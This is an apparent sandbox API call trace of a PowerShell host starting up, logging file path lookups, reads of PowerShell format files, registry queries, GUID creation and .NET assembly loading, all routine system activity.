	[0520.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0520.627] SetErrorMode (uMode=0x1) returned 0x1
	[0520.627] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cec0 | out: lpFileInformation=0x12cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0520.627] SetErrorMode (uMode=0x1) returned 0x1
	[0520.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0520.628] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cfa8 | out: phkResult=0x12cfa8*=0x2f8) returned 0x0
	[0520.628] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cf2c, lpData=0x0, lpcbData=0x12cf28*=0x0 | out: lpType=0x12cf2c*=0x1, lpData=0x0, lpcbData=0x12cf28*=0x56) returned 0x0
	[0520.628] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c0f70
	[0520.628] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cefc, lpData=0x1b7c0f70, lpcbData=0x12cef8*=0x56 | out: lpType=0x12cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cef8*=0x56) returned 0x0
	[0520.628] CoTaskMemFree (pv=0x1b7c0f70) 
	[0520.628] RegCloseKey (hKey=0x2f8) returned 0x0
	[0520.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0520.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0520.630] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x709e977e, Data2=0x38ea, Data3=0x42e0, Data4=([0]=0xbe, [1]=0x39, [2]=0x0, [3]=0x45, [4]=0x55, [5]=0xbe, [6]=0xdc, [7]=0xc3))) returned 0x0
	[0520.631] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xfca0823a, Data2=0x3453, Data3=0x4436, Data4=([0]=0x8b, [1]=0x34, [2]=0x9, [3]=0x77, [4]=0x68, [5]=0xfb, [6]=0x7c, [7]=0x3c))) returned 0x0
	[0520.632] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xa413f087, Data2=0xfcd1, Data3=0x4d6c, Data4=([0]=0x90, [1]=0x2f, [2]=0x94, [3]=0xda, [4]=0xc9, [5]=0x74, [6]=0xf6, [7]=0x41))) returned 0x0
	[0520.633] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x45db1c03, Data2=0x51c, Data3=0x42c6, Data4=([0]=0xad, [1]=0xf8, [2]=0xe6, [3]=0xe2, [4]=0x8, [5]=0xc1, [6]=0x5f, [7]=0xab))) returned 0x0
	[0520.633] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xf678e323, Data2=0xf886, Data3=0x491e, Data4=([0]=0x81, [1]=0x15, [2]=0x88, [3]=0xb6, [4]=0x1f, [5]=0xfb, [6]=0xe1, [7]=0x66))) returned 0x0
	[0520.634] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x8fc961af, Data2=0xa06a, Data3=0x405d, Data4=([0]=0xba, [1]=0xcc, [2]=0x70, [3]=0xfb, [4]=0x39, [5]=0xe, [6]=0x6d, [7]=0xbc))) returned 0x0
	[0520.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0520.635] SetErrorMode (uMode=0x1) returned 0x1
	[0520.635] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0520.635] GetFileType (hFile=0x2f8) returned 0x1
	[0520.635] SetErrorMode (uMode=0x1) returned 0x1
	[0520.635] GetFileType (hFile=0x2f8) returned 0x1
	[0520.635] ReadFile (in: hFile=0x2f8, lpBuffer=0x33f0a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33f0a08*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0520.637] ReadFile (in: hFile=0x2f8, lpBuffer=0x33f0a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33f0a08*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0520.637] ReadFile (in: hFile=0x2f8, lpBuffer=0x33f0a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33f0a08*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0520.637] ReadFile (in: hFile=0x2f8, lpBuffer=0x33f0a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33f0a08*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0520.638] ReadFile (in: hFile=0x2f8, lpBuffer=0x33f0a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33f0a08*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0520.638] ReadFile (in: hFile=0x2f8, lpBuffer=0x33f0a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33f0a08*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0520.638] ReadFile (in: hFile=0x2f8, lpBuffer=0x33f0a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33f0a08*, lpNumberOfBytesRead=0x12cf18*=0xaca, lpOverlapped=0x0) returned 1
	[0520.638] ReadFile (in: hFile=0x2f8, lpBuffer=0x33f003a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33f003a*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0520.638] ReadFile (in: hFile=0x2f8, lpBuffer=0x33f0a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33f0a08*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0520.639] CloseHandle (hObject=0x2f8) returned 1
	[0520.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0520.639] SetErrorMode (uMode=0x1) returned 0x1
	[0520.639] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cec0 | out: lpFileInformation=0x12cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0520.639] SetErrorMode (uMode=0x1) returned 0x1
	[0520.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0520.639] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cfa8 | out: phkResult=0x12cfa8*=0x2f8) returned 0x0
	[0520.639] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cf2c, lpData=0x0, lpcbData=0x12cf28*=0x0 | out: lpType=0x12cf2c*=0x1, lpData=0x0, lpcbData=0x12cf28*=0x56) returned 0x0
	[0520.639] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c0f70
	[0520.639] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cefc, lpData=0x1b7c0f70, lpcbData=0x12cef8*=0x56 | out: lpType=0x12cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cef8*=0x56) returned 0x0
	[0520.640] CoTaskMemFree (pv=0x1b7c0f70) 
	[0520.640] RegCloseKey (hKey=0x2f8) returned 0x0
	[0520.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0520.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0520.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0520.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0520.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0520.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0520.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0520.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0520.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0520.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0521.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0521.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0521.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0521.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0521.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0521.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0521.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0521.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0521.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0521.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0521.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0522.906] VirtualQuery (in: lpAddress=0x12ba40, lpBuffer=0x12c900, dwLength=0x30 | out: lpBuffer=0x12c900*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0522.907] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x1413ee21, Data2=0xc801, Data3=0x488d, Data4=([0]=0xac, [1]=0xb4, [2]=0x64, [3]=0xaf, [4]=0xd6, [5]=0x49, [6]=0x3c, [7]=0xf1))) returned 0x0
	[0522.907] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x6cec76d2, Data2=0x78ab, Data3=0x444d, Data4=([0]=0x87, [1]=0xf, [2]=0xee, [3]=0x75, [4]=0x37, [5]=0x6f, [6]=0x5e, [7]=0x55))) returned 0x0
	[0522.908] VirtualQuery (in: lpAddress=0x12bbf0, lpBuffer=0x12cab0, dwLength=0x30 | out: lpBuffer=0x12cab0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0522.909] VirtualQuery (in: lpAddress=0x12bbf0, lpBuffer=0x12cab0, dwLength=0x30 | out: lpBuffer=0x12cab0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0522.910] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x66c44c5f, Data2=0x6ee1, Data3=0x4aab, Data4=([0]=0xa0, [1]=0xbf, [2]=0x4c, [3]=0xe0, [4]=0x5e, [5]=0xa5, [6]=0x1b, [7]=0x33))) returned 0x0
	[0522.913] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x61837462, Data2=0x59e2, Data3=0x4af0, Data4=([0]=0x87, [1]=0x6f, [2]=0x29, [3]=0xd9, [4]=0x79, [5]=0x67, [6]=0xec, [7]=0xf))) returned 0x0
	[0522.914] VirtualQuery (in: lpAddress=0x12be40, lpBuffer=0x12cd00, dwLength=0x30 | out: lpBuffer=0x12cd00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0522.915] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x77dc79c8, Data2=0x91ec, Data3=0x492b, Data4=([0]=0x8e, [1]=0x8c, [2]=0x85, [3]=0xd4, [4]=0xed, [5]=0x26, [6]=0x89, [7]=0xa9))) returned 0x0
	[0523.819] VirtualQuery (in: lpAddress=0x12b4b0, lpBuffer=0x12c370, dwLength=0x30 | out: lpBuffer=0x12c370*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0523.820] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x22e2462c, Data2=0xc8f9, Data3=0x469e, Data4=([0]=0xb9, [1]=0xc5, [2]=0x57, [3]=0xb1, [4]=0x18, [5]=0x24, [6]=0xc9, [7]=0x66))) returned 0x0
	[0523.820] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x41c4a6bb, Data2=0x47c4, Data3=0x409c, Data4=([0]=0xa2, [1]=0x28, [2]=0x57, [3]=0xd6, [4]=0x9d, [5]=0x88, [6]=0x65, [7]=0x8f))) returned 0x0
	[0523.820] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0523.820] GetFileType (hFile=0x324) returned 0x1
	[0523.820] SetErrorMode (uMode=0x1) returned 0x1
	[0523.820] GetFileType (hFile=0x324) returned 0x1
	[0523.820] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.821] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.821] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.822] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.822] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.822] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.822] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.822] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.823] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
